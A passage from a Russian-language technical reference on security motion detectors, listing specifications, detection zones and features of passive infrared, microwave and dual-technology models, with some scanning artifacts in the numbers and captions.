Регистрируемая скорость перемещения, м/с............................... 0, 3—3, 0

Потребляемый ток:

«Фотон-6», мА............................................................................. 15

« Фотон-8», мА.............................................................................. 1

Диапазон рабочих температур:

«Фотон-6», °С............................................................. от -30 до+ 50

"Фотон-8", °С............................................................. от -10 до+ 50

Габаритные размеры, мм....................................................... 107х107х64

Масса, кг....................................................................................... 0, 25

Детектор движения «Фотон-СК»

Охранный объемный оптико-электронный детектор движения «Фотон-СК» (рис. 3. 14) производится в России. Он разработан совместно с американской фирмой С&К Systems по заказу Главного управления вневедомственной охраны МВД России. Датчик рекомендуется использовать для установки в жилых помещениях, офисах и на небольших предприятиях.

3-2-43.jpg

Особенности детектора «Фотон-СК»:

> отключение светодиодного индикатора в режиме охраны;

> защита от несанкционированного вскрытия;

> высокая помехоустойчивость;

> защита от домашних животных;

> минимальное количество комплектующих элементов;

> возможность установки на стене или в углу помещения.

В настоящее время прибор «Фотон-СК» является одним из самых дешевых детекторов движения на российском рынке. При производстве прибора используется современное технологическое оборудование для поверхностного монтажа фирмы Universal Instruments Corporation, что дает возможность получить очень высокие характеристики прибора.

Детектор имеет пять зон обнаружения и перекрывает территорию размером 15х12 м

(рис. 3.15). Цифровая обработка сигнала позволяет исключить срабатывание датчика от пролетающих насекомых. Дополнительная линза позволяет ограничить зону обнаружения снизу до определенной высоты, обеспечивая тем самым защиту от домашних животных.

 

3-2-44.jpg

Рис. 3. 15. Зоны обнаружения прибора «Фотон-СК»

Основные технические характеристики прибора «Фотон-СК»:

Размер зоны обнаружения, м......................................................... 15х12

Напряжение питания, В.............................................................. 10—14

Потребляемый ток, мА....................................................................... 20

Диапазон рабочих температур, °С...................................... от -18 до+ 49

Габаритные размеры, мм.......................................................... 90х64х41

Масса, г............................................................................................ 85

"Фотон-СК" — это один из лучших детекторов, выпускаемых отечественной промышленностью. Он обладает наивысшим показателем качество/цена.

Рис. 3.12. Детектор движения "Фотон-СК"

Изображение: 

Рис. 3.12. Детекторы движения «Фотон-6» и «Фотон-8»

Изображение: 

Рис. 3.13. Зоны обнаружения детектора «Фотон-6»

Изображение: 

Рис. 3.15. Зоны обнаружения прибора «Фотон-СК»

Изображение: 

3.2.5. Детектор движения МРС 4040Т.

3. 2. 5. Детектор движения МРС 4040Т

Пассивный инфракрасный детектор МРС 4040Т с двойным чувствительным датчиком производства компании IntelliSense — это экономичный прибор с размером зоны обнаружения 12х15 м (рис. 3. 16). В нем используется запатентованная технология С&К, а также комбинация сегментного зеркала и линзы Френеля, что практически исключает возможный саботаж прибора.

Особенности детектора МРС 4040Т:

> температурная компенсация;

> регулировка чувствительности;

> регулировка зоны обнаружения в зависимости от высоты установки;

> устойчивость к белому свету;

> дополнительный поворотный кронштейн.

3-2-51.jpg

3-2-52.jpg

Рис. 3. 17. Зоны обнаружения прибора МРС4040Т

В приборе используется двойной пироэлемент с регулируемой чувствительностью. При использовании линзы «широкий угол» (рис. 3. 17) площадь, контролируемая прибором, составит 144 м2 (12х12 м). Возможна установка линзы «вертикальная занавеска», которая обеспечивает узкую охраняемую зону длиной до 18 м. Линза «горизонтальная занавеска» для защиты от домашних животных исключает срабатывание детектора при возникновении движения в зоне, высота которой ниже 1, 2 м. Это обеспечивается как при использовании широкой, так и узкой диаграммы направленности.

Основные технические характеристики прибора МРС4040Т:

Размер зоны обнаружения, м......................................................... 12х 12

Устойчивость к радиопомехам на расстоянии 3 м

в диапазоне 20-100 МГц, Вт........................................................... 100

Устойчивость к белому свету на расстоянии 2, 4 м не менее, кд......... 20000

Напряжение питания, В................................................................ 8—14

Потребляемый ток (при напряжении питания+ 12 В), мА...................... 20

Выходные реле:

реле тревоги, мА, В.............................................................. 100/30

реле вмешательства, мА/ В...................................................... 25 /30

Диапазон рабочих температур, С...................................... от -18 до+ 65

Габаритные размеры, мм.......................................................... 92х60х50

Масса, г............................................................................................ 71

Датчик устанавливается на стену или в углу помещения. Для установки может использоваться дополнительный поворотный кронштейн типа DT4SW. Детектор предназначен для охраны закрытых помещений. Высокое качество и умеренная цена прибора — это как раз то, что делает его конкурентно способным на отечественном рынке технических средств охраны.

Рис. 3.16. Детектор движения МРС 4040Т.

Изображение: 

Рис. 3.17. Зоны обнаружения прибора МРС4040Т

Изображение: 

3.2.6. Детекторы серии IQ200

3.2.6. Детекторы серии IQ200

3-2-61.jpg

Пассивные инфракрасные детекторы движения серии IQ200 компании IntelliSense используют комбинацию четырех пироэлементов с регулируемой чувствительностью. Приборы (рис. 3.18) предназначены для организации охраны и установки в жилых помещениях, офисах и на небольших предприятиях. Детектор IQ220T имеет радиус действия 12 м, а детектор IQ260T —18м. Особенности детекторов серии 10200:

> возможность регулировки размеров зоны обнаружения;

> светодиодная индикация режима работы;

> устойчивость к радиопомехам;

> устойчивость к белому свету;

> температурная компенсация.

В модели IQ220T реализована запатентованная технология С&К, благодаря которой практически полностью исключены ложные срабатывания системы. Многосегментное зеркало и линза Френеля обеспечивают зону обнаружения площадью около 200 м2. С помощью набора линз можно получить необходимую диаграмму направленности детектора (рис. 3.19). Прибор может оснащаться линзой «горизонтальная занавеска» для защиты от ложной тревоги, вызванной домашними животными. Детектор содержит два двойных пироэлемента с регулируемой чувствительностью.

Основные технические характеристики приборов серии IQ200:

Размер зоны обнаружения:

IQ220T,M................................................................................ 12х12

IQ260T, м................................................................................ 18х15

Устойчивость к радиопомехам на расстоянии 3 м

в диапазоне 27-1000 МГц, Вт .......................................................... 100

Устойчивость к белому свету на расстоянии 2,4 м, кд....................... 20000

Напряжение питания, В.............................................................. 10—14

Потребляемый ток (при напряжении питания +12 В), мА ......................30

Выходные реле:

реле тревоги, мА/В .............................................................. 100/30

реле вмешательства, мА/ В ...................................................... 25/30

Диапазон рабочих температур, °С ...................................... от -18 до +65

Габаритные размеры, мм ........................................................ 130х70х60

Масса, г .......................................................................................... 227

3-2-62.jpg

Рис. 3. 19. Зоны обнаружения детектора IQ200T

Детекторы серии IQ200 устанавливаются на стену или в угол помещения. Возможно применение дополнительного поворотного кронштейна для лучшего перекрытия охраняемой зоны. Современный дизайн прибора хорошо вписывается в любой интерьер квартиры или офиса.

Рис. 3.18. Детекторы серии IQ200

Изображение: 

Рис. 3.19. Зоны обнаружения детектора IQ200T

Изображение: 

3.2.7. Потолочный детектор FIR5030.

3. 2. 7. Потолочный детектор FIR5030

Детектор движения FIR5030 компании С&К (IntelliSense) — это два самостоятельных прибора в одном корпусе: пассивный инфракрасный детектор и детектор битого стекла. FIR5030 имеет круговую диаграмму направленности и предназначен для установки на потолке охраняемого помещения. Он имеет современный дизайн (рис. 3. 20) и высокие эксплуатационные характеристики, что делает его прекрасным средством для охраны помещений, например небольших магазинов со стеклянным фасадом или офисов. Особенности детектора FIR5030:

> возможность монтажа заподлицо с поверхностью потолка и на подвесном потолке;

> два выходных реле в одном корпусе (для каждого детектора свое);

> регулируемая высота монтажа;

> регулировка чувствительности;

> светодиодный индикатор режима работы;

> запоминание сигнала тревоги.

3-2-71.jpg

В состав прибора входит пассивный инфракрасный (ПИК) детектор с круговой диаграммой направленности на основе пироэлемента с регулируемой чувствительностью. Он предназначен для обнаружения несанкционированного входа в помещение. В нем может быть использовано одно из двух взаимозаменяемых зеркал, применение которых определяется высотой установки прибора и необходимым количеством лучей детекции (рис. 3. 21).

При установке зеркала. № 1 высота монтажа должна составлять от 2, 5 до 3, 5 м от пола. При этом диаграмма направленности будет состоять из 77 лучей детекции различной длины.

При установке зеркала №2 высота установки должна быть 3, 5—4, 9 м. Число лучей детекции при этом уменьшается до 61.

Второй детектор прибора — это детектор битого стекла (ДБС)Flex Guard

с радиусом действия до 9 м, предназначенный для регистрации факта разбивания стекла и формирования сигнала тревоги. Принцип действия детектора основан

на анализе спектра звукового сигнала, возникающего при ударе о стекло

и при его разбивании. Для формирования сигнала тревоги прибор должен

зарегистрировать удар о стекло и звон разбиваемого стекла, причем интервал

между обоими звуками должен быть не более 150 мс. Это исключает возможность ложного срабатывания. Радиус действия детектора битого стекла зависит от сорта, толщины и размера стекла. Поэтому для настройки прибора необходимо использовать специальный имитатор разбивания стекла FlexGuard 700..

Технические характеристики детектора FIR5030:

Радиус зоны обнаружения ПИК детектора, м.......................................15

Число лучей детекции не менее ..........................................................61

Высота установки, м ........................................................... от 2,5 до 4,9

Радиус обнаружения ДБС не более, м .................................................. 9

Сорт стекла ................................................ металлизированное, слоистое

закаленное, усиленное Толщина стекла, мм ....................................................................... 4 — 7

Размер стекла не менее, мм ....................................................... 270х270

Напряжение питания, В ............................................................ 8,5—1,6

Потребляемый ток (при напряжении питания +12 В), мА ......................40

Выходные реле:

реле тревоги ПИК детектора, мА/В ....................................... 500/30

реле тревоги ДБС, мА/В ....................................................... 500/30

реле вмешательства, мА/ В...................................................... 25 /30

3-2-72.jpg

Рис. 3. 21. Зоны обнаружения детектора FIR5030

Прибор может быть установлен на поверхности потолка или заподлицо с ней. Высота монтажа регулируется с помощью дополнительного зеркала. В приборе предусмотрена возможность регулировки чувствительности ПИК детектора и ДБС и запоминание сигнала тревоги.

Рис. 3.20. Потолочный детектор движения FIR5030

Изображение: 

Рис. 3.21. Зоны обнаружения детектора FIR5030

Изображение: 

3.2.8. Детекторы движения фирмы Arrowhead.

3.2.8. Детекторы движения фирмы Arrowhead

Пассивные инфракрасные детекторы движения фирмы Arrowhead в России широко представлены изделиями серии 300 и 1000. Все они имеют современный дизайн и высокие технические характеристики. Внешний вид детекторов движения и их характеристики приведены в табл. 3.1.

3.3. Радиоволновые и комбинированные детекторы движения.

3. 3. Радиоволновые и комбинированные детекторы движения

Радиоволновые детекторы движения предназначены для обнаружения и регистрации движения в охраняемой зоне. Каждый детектор содержит СВЧ-модуль, в состав которого входят излучатель и приемник высокочастотных колебаний. В отличие от пассивных ИК детекторов, подробно рассмотренных выше, радиоволновые детекторы являются активными устройствами, так как излучают в пространство СВЧ колебания. Принцип действия этих приборов основывается на интерференции радиоволн сантиметрового диапазона или эффекте Доплера (изменение частоты принимаемого сигнала, отраженного от движущегося объекта).

При охране внутренних помещений по характеристикам радиоволновые детекторы аналогичны описанным выше пассивным ИК детекторам. Однако в отличие от них, они имеют более низкую помехозащищенность и достаточно высокий уровень СВЧ излучений. Поэтому в последнее время все чаще стали применяться приборы, в состав которых входят два детектора — пассивный ИК и радиоволновый. Это так называемые детекторы двойной технологии. В таких приборах пассивный И К детектор работает непрерывно. При регистрации им факта движения теплового объекта в зоне обнаружения включается радиоволновый детектор. Если последний подтвердит наличие подвижного объекта в зоне охраны, прибор сформирует и выдаст по шлейфу сигнализации тревожное извещение путем замыкания или размыкания контактов выходных реле. Такой режим работы детекторов позволяет обеспечить высокий уровень помехозащищенности прибора и уменьшить уровень СВЧ излучений, поскольку радиоволновый детектор включается только на короткое время.

Радиоволновые детекторы могут работать на одной из нескольких рабочих частот (литер), устанавливаемых с помощью переключателей на плате СВЧ-модуля прибора. Это позволяет использовать несколько однотипных детекторов, работающих на различных частотных литерах, в одном помещении одновременно

Таблица 3. 1. Пассивные ИК детекторы фирмы Arrowhead

3-31.jpg

3. 3. 1. Детекторы движения фирмы Dual Тес.

3.3.1. Детекторы движения фирмы Dual Tec

3-3-11.jpg

Детекторы движения фирмы Dual Tec, комбинирующие пассивную инфракрасную и радиоволновую технологии, обеспечивают одновременно необходимую чувствительность и стабильность работы, а также практически полностью исключают ложные срабатывания. Детекторы движения серии DT5000 (рис. 3. 22) предназначены для установки на потолке и имеют зону обнаружения радиусом до 15 м.

Особенности детекторов серии DT5000:

> ПИК и радиоволновый детекторы в одном корпусе;

> круговая диаграмма направленности;

> высокая защищенное, от радиопомех;

> низкий уровень ложных срабатываний

> простота установки.

Приборы этой серии, например детектор DT5360 компании С&К с зоной обнаружения радиусом 15 м, устанавливается на потолке и является альтернативным вариантом детекторам, устанавливаемым на стенах.

В приборе, предназначенном для установки на потолке , в одном корпусе находятся инфракрасный пассивный детектор с зоной обнаружения 360 и уникальный радиоволновый детектор. Прибор может быть установлен на поверхности потолка или заподлицо с ней при помощи специального кронштейна. Высота установки может меняться от 2ю5м при использовании стандартного до 5 м со специальным зеркалом,входящим в комплект поставки прибора. При этом число лучей детекции ПИК датчика изменяется от 72 до 61 (рис. 3.23).

Применение в детекторах движения комбинации пассивной ИК и микроволновой технологий делает приборы фирмы Dual Tec более надежными, чем другие, построенные с использованием только одной технологии регистрации движения. В то же время эти приборы используют метод «последовательных сигналов», с помощью которого исключается сигнал тревоги в случае, если после регистрации движения радиоволновым датчиком не последует подтверждение этого факта от инфракрасного датчика, регистрирующего изменение температуры, или наоборот. Это также способствует уменьшению вероятности ложных срабатываний. Радиоволновый детектор включается только после

3-3-12.jpg

Высота установки

Внешняя окружность

Средняя окружность

Внутренняя окружность

Центр

А

В

С

D

Е

F

Q

2. 4м

7, 7м

5, 7м

3. 6м

2, 7 м

1. 7м

1. 3 м

0. 5м

2. 7м

9, 6 м

7. 1 м

4. 5м

3. 4м

2, 1 м

1, 6 м

0, 6м

3, 3м

13, 4м

10, 0м

6. 3м

4. 8м

3, 0м

2, 3м

0, 9м


Высота установки

Внешняя окружность

Внутренняя окружность

Центр

А

В

С

D

Е

3. 6м

6, 0м

4, 8м

3. 7м

2. 5м

0. 7м

4, 2м

7, 5м

6, 1 м

4, 6м

3, 1 м

0. 9м

4, 8м

9. 0м

7, 3м

5, 5м

3. 8м

1, 0м


Рис. 3. 23. Зоны обнаружения приборов DT5360, DT6360STC

обнаружения движения инфракрасным детектором, который находится во включенном состоянии непрерывно. В детекторе DT5360, в отличие от детектора DT6360STC, радиоволновый и ИК каналы работают непрерывно.

Основные технические характеристики приборов DT5360 и DT6360STC:

Радиус обнаружения ПИК детектора, м............................................... 15

Устойчивость к радиопомехам на частоте 10—1000 МГц, В/м............... 30

Рабочая частота радиоволнового источника:

DT5360, ГГц.................................................................... 9, 9-10, 687

DT6360STC, ГГц..................................................................... 10, 525

Выходные реле:

реле тревоги, мА/ В.............................................................. 100 / 30

реле вмешательства, мА/В...................................................... 25/30

Напряжение питания, В............................................................. 8, 5—16

Потребляемый ток (при напряжении питания+ 12 В), мА...................... 40

Диапазон рабочих температур, С.................................... от -18 до+ 64, 6

Габаритные размеры, мм....................................................... 127х 127х57

Масса:

DT5360, г................................................................................... 213

DT6360STC, г.............................................................................397

Для проверки работоспособности детектора имеется перемычка W4, установив которую, можно отключить радиоволновую часть прибора. После окончания проверки детектора эта перемычка убирается.

Детекторы предназначены для охраны жилых помещений, офисов и других закрытых помещений.

Особенности детектора DT6360STC:

> улучшенная микропроцессорная обработка сигналов;

> радиоволновая и ПИК технологии обнаружения;

> встроенные системы контроля и диагностики;

> запуск самодиагностики по команде микропроцессора;

> возможность установки на подвесном потолке.

Детектор серии DT6360STC (рис. 3. 22) использует сочетание круговых диаграмм направленности пассивного ИК и радиоволнового детекторов. Сигналы, поступающие от этих детекторов, постоянно анализируются и раздельно классифицируются для выделения характеристик нарушителя. Длительность и последовательность их прихода анализируется в соответствии с установленными значениями параметров алгоритма обработки для оптимизации эффективности обнаружения и устойчивости к ложным срабатываниям.

Встроенные системы контроля и диагностики позволяют быстро обнаружить, определить и скорректировать неисправности. Микропроцессор автоматически запускает серию проверок работоспособности прибора при подаче напряжения питания, периодически во время работы и при обнаружении неисправности. Автоматическая цепь контролирует радиоволновый детектор, При потере сигнала микропроцессор выполняет самотестирование и прибор переходит на работу с использованием только ПИК детектора.

Рис. 3.22 Детекторы движения фирмы Dual Tec - DT5360, DT6360STC

Изображение: 

Рис. 3.23 Зоны определения детектора

Изображение: 

3. 3. 2. Детекторы движения серии 8100S.

3. 3. 2. Детекторы движения серии 8100S

Детекторы движения серии 8100S компании С&К используются тогда, когда требуется обеспечить надежную охрану в неблагоприятных условиях окружающей среды. Прочный корпус (рис. 3. 24) и высокая устойчивость работы позволяют использовать детектор в промышленных условиях. Максимальная дальность действия детектора 8120S достигает 61 м, что делает его идеальной альтернативой активным инфракрасным детекторам.

3-3-21.jpg

Рис. 3. 24. Детектор 8110S

Особенности детекторов серии 8100S:

> контроль работоспособности;

> комбинация ПИК и радиоволнового детекторов;

> высокая чувствительность;

> высокая помехоустойчивость

> ударопрочный стальной корпус;

> непрерывная работа радиоволнового и ПИК детекторов.

Детекторы движения серии 8100S используют пассивную ИК и микроволновую технологии, которые обеспечивают необходимую помехоустойчивость, чувствительность и стабильность работы приборов в целом. Детекторы 8110S и 8120S имеют узкую диаграмму направленности, a8140S — широкую (рис. 3. 25). Соотношение размеров зон обнаружения при установке детектора на высоте 3, 65 м приведены в табл. 3. 2. Детектор 8140S имеет 19 лучей детекции, образующих дальнюю (11 лучей), промежуточную (5 лучей) и ближнюю (3 луча) зоны обнаружения, а детектор 8120S — 9 лучей детекции, образующих дальнюю (1 луч), промежуточную (5 лучей) и ближнюю (3 луча) зон соответственно.

3-3-22.jpg

Рис. 3. 25. Зоны обнаружения детекторов серии 8100S

Основные технические характеристики приборов серии 8100S:

Размер зоны обнаружения, м:

8140S..................................................................................... 2.7х21

8110S...................................................................................... 37х3

8120S...................................................................................... 61х5

Рабочая частота микроволнового источника, ГГц........................ 9—10, 687

Устойчивость к радиопомехам на

расстоянии 3 м при частоте 27— 1000 МГц, В/м................................. 100

Напряжение питания, В........................................................... 5, 5—16, 0

Потребляемый ток (при напряжении питания+ 12 В), мА...................... 35

Выходные реле:

реле тревоги................................................................ трехполюсное

реле вмешательства...................................................... двухполюсное

реле неисправности...................................................... трехполюсное

Габаритные размеры,мм..................................................... 210x110x142

Масса, кг....................................................................................... 2, 75

Таблица 3. 2 Размеры зон обнаружения детекторов серии 8100S (к рис. 3. 25)

Модель

Высота установки, м

Длина, м

Ширина, м

Х

А

В

С

Y

8140S

3, 65

27

11

4

21

8110S

3, 65

37

9

4

3

8120S

3, 65

61

12

4

5


Детекторы имеют запатентованную цепь «Информер», которая используется для'контроля работоспособности прибора. При сопоставлении сигналов от обоих детекторов неоднозначность в их показаниях может означать, что один из датчиков блокирован или неисправен. Сравнивая количество несоответствий (четыре возможных варианта), цепь «Информер» фиксирует неисправность детектора и выдает соответствующее извещение (выходное реле неисправности).

Неисправность детектора может быть определена пользователем на месте (мигание красного светодиода) или по информации, передаваемой на контрольную панель при помощи специального, не входящего в комплект поставки, реле.

Детекторы движения серии 8100S выполнены в стальном корпусе совместно с реле вмешательства, что позволяет использовать их в сложных производственных и природных условиях.

Рис. 3.24. Детектор 8110S

Изображение: 

Рис. 3.25. Зоны обнаружения детекторов серии 8100S

Изображение: 

3. 3. 3. Детекторы движения серии DT400.

3. 3. 3. Детекторы движения серии DT400

Детекторы движения серии DT400 основаны на использовании двойной технологии — пассивной ИК и радиоволновой, что обеспечивает высокую чувствительность и стабильность работы приборов. Детекторы могут использоваться как в жилых, так и в производственных помещениях. Благодаря современному дизайну корпуса, они вписываются в любой интерьер. Внешний вид детекторов DT400T и DT400S представлен на рис. 3. 26, а и б.

3-3-31.jpg

Рис. 3. 26. Детекторы DT400T (а) и DT400S (б)

Особенности детекторов серии DT400:

> двойная технология;

> высокая чувствительность;

> расширенная зона обнаружения;

> контроль работоспособности радиоволнового детектора;

> регулируемая дальность обнаружения;

> защищенность от радиопомех;

> современный дизайн.

Так как в приборах сравниваются сигналы тревоги ПИК и радиоволнового детекторов, практически полностью исключаются ложные срабатывания. Это существенно увеличивает помехоустойчивость приборов, по сравнению с детекторами, использующими для регистрации вторжения в охранную зону только одну технологию. В приборах непрерывно работает ПИК детектор, который в случае обнаружения движения включает радиоволновый детектор.

При помощи оригинального многосегментного зеркала и линзы Френеля лучи детекции имеют большую длину, некоторые из них направлены непосредственно вниз, образуя нижнюю зону (рис. 3. 27). Это уменьшает возможность стороннего нарушения работоспособности детектора. Зона обнаружения инфракрасного детектора содержит 23 луча детекции, образующих дальнюю (9 лучей), промежуточную (6 лучей), ближнюю (5 лучей) и нижнюю (3 лучей) зоны. Размеры зон обнаружения приведены в табл. 3. 3.

Основные технические характеристики приборов серии DT400:

Частота излучения, ГГц....................................................... 9, 47—10, 687

Устойчивость к радиопомехам на

расстоянии 3 м в диапазоне 27— 1000 МГц, В/м................................. 100

Количество лучей детекции................................................................ 23

3-3-32.jpg

Рис. 3. 27. Зоны обнаружения приборов серии DT400

Напряжение питания, В............................................................ 10, 5— 16

'Ток потребления (при напряжении питания +12 В), мА ........................30

Диапазон рабочих температур, С...................................... от -18 до+ 60

Габаритные размеры, мм........................................................ 70х60х130

Масса, кг....................................................................................... 0, 36

Таблица 3. 3. Размеры зон обнаружения детекторов серии DT400

Модель

Высота установки, м

Длина, м

Ширина, м

Х

А

В

С

D

Y

420Т

2, 30

8

6

3

0, 30

6

435Т

2, 30

11

8

4

0, 30

9

450Т

2, 30

14

11

6

0, 30

12

440S

2, 30

12

10

4, 50

0, 30

12

460S

2, 30

18

15

6

0, 30

18


Детекторы серии DT400 являются идеальным решением задачи охраны в тех условиях, где приборы, выполненные по одинарной технологии, не в состоянии справиться. Компактный внешний вид приборов и встроенное реле вмешательства позволяют использовать их как в жилых, так и в производственных помещениях. Детекторы осуществляют непрерывный контроль за состоянием радиоволнового датчика и формируют соответствующий сигнал путем размыкания контактов выходного реле в случае нарушения их работы.

Модификации детекторов DT4201, DT4351 и DT4501 выпускаются по лицензии фирмы С&К в г. Рязани совместно с Главным Управлением вневедомственной охраны.

Детектор устанавливается на стену при помощи поворотного кронштейна типа DT4SW, а на потолок — с помощью кронштейна типа DT4SM.

Детекторы серии «S» имеют запатентованную цепь "Информер", предназначенную для индикации состояния блокировки прибора или при выходе его из строя. Информация о неисправности прибора может отображаться на месте при помощи светодиодного индикатора или быть передана по шлейфу сигнализации на контрольную панель.

Рис. 3.26. Детекторы DT400T (а) и DT400S (б)

Изображение: 

Рис. 3.27. Зоны обнаружения приборов серии DT400

Изображение: 

3. 3. 4. Детекторы движения серии DG1000.

3. 3. 4. Детекторы движения серии DG1000

Детекторы движения серии DG1000 (рис. 3. 28) для увеличения чувствительности и исключения ложных срабатываний построены по двойной технологии. Приборы могут использоваться в жилых, а также в производственных помещениях с повышенными требованиями к безопасности.

3-3-41.jpg

В детекторах используется комбинация пассивного И К и радиоволнового датчиков. Алгоритм работы этих устройств практически полностью исключает возможность ложной тревоги.

Особенности детекторов серии DG1000:

> И К и радиоволновая технологии;

> уникальная оптическая система;

> температурная компенсация;

> защита от радиопомех;

> оптические линзы;

> расширенная зона обнаружения.

Детекторы имеет 24 луча, образующих дальнюю (11 лучей), промежуточную (7 лучей), ближнюю (4 луча) и нижнюю (2 луча) зоны (рис. 3. 29). Размеры зон обнаружения приведены в таблице на рис. 3. 29. Основные технические характеристики:

Размер зоны обнаружения:

DG1035. M................................................................................ 11х9

DG1050. M............................................................................... 15х12

Рабочая частота микроволнового источника, ГГц................................ 2, 45

Устойчивость к радиопомехам в диапазоне 10— 10000 МГц, В/м........... 30

Напряжение питания, В.............................................................. 10—14

Ток потребления (при напряжении питания+ 12 В), мА........................ 35

Диапазон рабочих температур,С...................................... от -10 до +49

Габаритные размеры, мм........................................................ 130х70х40

Масса, кг....................................................................................... 0,17

3-3-42.jpg

Рис. 3. 29. Зоны обнаружения приборов серии DG1000

Рис. 3.28. Детектор движения серии DG1000

Изображение: 

Рис. 3.29. Зоны обнаружения приборов серии DG1000

Изображение: 

3. 3. 5. Комбинированные детекторы фирмы Arrowhead.

3.3.5. Комбинированные детекторы фирмы Arrowhead

Детекторы движения фирмы Arrowhead, включающие в себя радиоволновый и пассивный И К датчики, представлены на российском рынке моделями серии 1000. Они имеют современный дизайн, сочетающийся с любым интерьером помещения и высокие характеристики обнаружения. Внешний вид приборов и их технические характеристики приведены в табл. 3.4.

3. 3. 6. Извещатели объемные радиоволновые "Аргус-2" и " Волна-5".

3.3.6. Извещатели объемные радиоволновые «Аргус-2» и «Волна-5»

3-3-61.jpg

Охранные извещатели отечественного производства «Аргус-2», "Волна-5" предназначены для регистрации факта проникновения в охраняемое пространство закрытого помещения и формирования тревожного извещения. Оба извещателя рекомендованы для использования ГУВО МВД РФ. Извещатели устанавливаются на стене охраняемого помещения (рис. 3.30). Особенности извещателей:

> высокая степень обнаружения;

> отсутствие ложных срабатываний, даже в помещениях с интенсивной вентиляцией;

> возможна эксплуатация нескольких извещателей в одном помещении (4 частотные литеры);

> регулируемая дальность действия;

> индикация помех.

Извещатель "Волна-5" не требует отдельного источника питания. Питание осуществляется по шлейфу приемно-контрольного прибора или от систем «Фобос», «Нева». Извещатели "Аргус-2" и «Волна-5» имеют зону обнаружения площадью около 90 м2 и контролируют объем до 200 м3 (рис. 3.31).

Основные технические характеристики извещателей «Аргус-2» и «Волна-5».

Дальность действия;

максимальная, м..................................................................... 12—16

минимальная, м.........................................................................2—4

Площадь зоны обнаружения, м2........................................................... 90

Контролируемый объем, м3 ............................................................... 200

Напряжение питания, В:

"Аргус-2" ............................................................................... 2 - 12

Таблица 3.4. Комбинированные детекторы фирмы Arrowhead

3-3-62.jpg

3-3-63.jpg

Рис. 3.31. Схема зон обнаружения извещателей «Аргус-2» и «Волна-5»

"Волна-5" (по шлейфу) ......................................................... 12—72

Потребляемый ток, мА:

"Аргус-2" ...............................................................................2-30

«Волна-5» ................................................................................ 5 — 2

Диапазон рабочих температур, С ...................................... от -30 до +50

Габаритные размеры, мм .......................................................... 98х85х62

Масса, кг..................................................................................... 0,250

Тревожное извещение «Аргус-2» формирует путем размыкания контактов выходного исполнительного реле, а извещатель "Волна-5" — путем изменения тока обтекания шлейфа.

Рис. 3.30. Извещатели объемные радиоволновые «Аргус-2» и «Волна-5»

Изображение: 

Рис. 3.31. Схема зон обнаружения извещателей «Аргус-2» и «Волна-5»

Изображение: 

Таблица 3.4. Комбинированные детекторы фирмы Arrowhead

Изображение: 

3. 3. 7. Объемный радиоволновый детектор "Аргус-3".

3.3.7. Объемный радиоволновый детектор «Аргус-3»

Охранный объемный радиоволновый детектор "Аргус-3" предназначен для обнаружения проникновения в охраняемое пространство закрытого помещения малого объема и формирования тревожного извещения путем размыкания контактов выходого исполнительного реле. Прибор выполнен на современной элементной базе и имеет прекрасный дизайн. Несколько вариантов крепления прибора позволяют устанавливать его практически в любом месте помещения.

Особенности извещателя «Аргус-З». > высокая степень обнаружения проникновения в зону охраны;

> отсутствие ложных срабатываний, даже в помещениях с интенсивной вентиляцией;

> эксплуатация нескольких извещателей в одном помещении (2 частотных литеры);

> регулировка дальности действия;

> индикация помех.

Датчик "Аргус-3" имеет узкую диаграмму направленности в горизонтальной и вертикальной плоскости (рис. 3. 32).

3-3-71.jpg

Рис. 3. 32. Зона обнаружения детектора «Аргус-3»

Основные технические характеристики прибора:

Дальность действия:

максимальная, м...................................................................... 6 — 7, 5

минимальная, м......................................................................... 2—3

Площадь зоны обнаружения, м2........................................................... 20

Напряжение питания, В............................................................ 10, 2—15

Потребляемый ток, мА....................................................................... 30

Диапазон рабочих температур, С...................................... от -10 до+ 50

Габаритные размеры, мм.......................................................... 90х75х40

Рис. 3.32. Зона обнаружения детектора «Аргус-3»

Изображение: 

3. 3. 8. Детектор движения наружного применения Piramid EH

3.3.8. Детектор движения наружного применения PIRAMID ЕН

3-3-81.jpg

Детектор движения PIRAMID EH (Passive InfraRed And Microwave Intruder Detector) — это продукция компании Protection Technologies Inc., впервые поставляемая в Россию. PIRAMID EH (рис. 3. 33) — это детектор движения, использующий двойную технологию: комбинированный радиоволновый и двойной пассивный инфракрасный датчики. Он надежно работает в широком диапазоне внешних условий и используется для наружного применения. Особенности детектора PIRAMID EH:

> двухканальный доплеровский радиоволновый датчик;

> двойной пассивный ИК датчик;

> температурная компенсация пассивного ИК детектора;

> 6 уровней чувствительности радиоволнового детектора;

> 2 уровня чувствительности для пассивного ИК детектора;

> раздельная регулировка дальности действия радиоволнового и пассивно го И К датчиков;

> сменные линзы для пассивного ИК детектора;

> двухуровневая светодиодная индикация.

Главным фактором, обеспечивающим надежность прибора, является применение уникального двухканального доплеровского радиоволнового детектора. Этот детектор выполняет свои функции гораздо лучше, чем обычный радиоволновый детектор, т. к. он игнорирует такие источники ложных срабатываний, как различные вибрации и случайные перемещения объектов. Кроме того, этот прибор позволяет устанавливать дистанцию до движущегося объекта, при которой должна происходить тревога.

Выпускается несколько моделей PIRAMID, в которых используются различные линзы, обеспечивающие необходимую зону обнаружения. На отечественный рынок поступают три базовые модели: SDI-76EH, SDI-77EH, SDI-77EH1. Каждая модель имеет фиксированную зону обнаружения, которая определяется стандартной линзой. Модель SDI-76EH оснащена линзой типа А, которая обеспечивает максимальную площадь (15х15 м) зоны обнаружения (рис. 3. 34).

Модель SDI-77EH оснащена стандартной линзой типа С1 («широкий угол»), обеспечивающей, для данной модели, зону обнаружения размером 30х4, 5 м. Модель SDI-77EH1 с той же линзой типа С1 перекрывает зону размером 45х6 м.

Уникальная комбинация высокоэффективного радиоволнового двухканального с термостабилизацией и двухэлементного пассивного ИК датчиков позволяет получить прибор с очень высокими характеристиками обнаружения при низкой вероятности ложных тревог. Двухуровневая светодиодная индикация режимов работы прибора по каждому из каналов (различные варианты включения светодиодов) обеспечивает дистанционный контроль за функционированием детектора.

Основные технические характеристики приборов PIRAMID EH:

Максимальная дальность действия:

SDI-76EH/SDI-76EHV.M......................................................... 15х15

SDI-77EH/SDI-77EHV.M........................................................ 30х4,5

SDI-77EH1/SDI-77EH1V, м ...................................................... 45х6

Количество уровней чувствительности:

радиоволнового детектора............................................................... 6

инфракрасного детектора ............................................................... 2

Напряжение питания, В .............................................................. 10—20

Диапазон рабочих температур, С...................................... от -34 до+ 54

Высокие технические характеристики прибора, металлический ударопрочный и герметичный корпус позволяют использовать его практически в любых условиях окружающей среды.

Детектор широко используется для охраны периметров различных объектов, крыш зданий, строительных площадок, автостоянок и других объектов.

3-3-82.jpg

